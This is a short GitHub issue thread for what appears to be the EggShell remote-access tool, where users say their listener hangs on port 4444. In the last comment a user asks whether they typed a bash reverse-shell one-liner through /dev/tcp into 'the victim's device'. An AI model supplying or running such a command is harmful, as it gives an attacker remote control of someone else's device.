### ISSUE TITLE
Why my console stuck in Listening on port 4444...

### ISSUE THREAD

**Issue by luke-shu** [neoneggplant/EggShell#63]
my console stuck in Listening on port 4444... and did not go further

**Comment by SPARTANHJS** [comment]
Same here ! 😵

**Comment by drdrth** [comment]
guys did anybody found a solution for this issue ?

**Comment by paskalev2001** [comment]
did you type in the "**_bash &> /dev/tcp/0.0.0.0/4444 0>&1_**" into the victim's device?
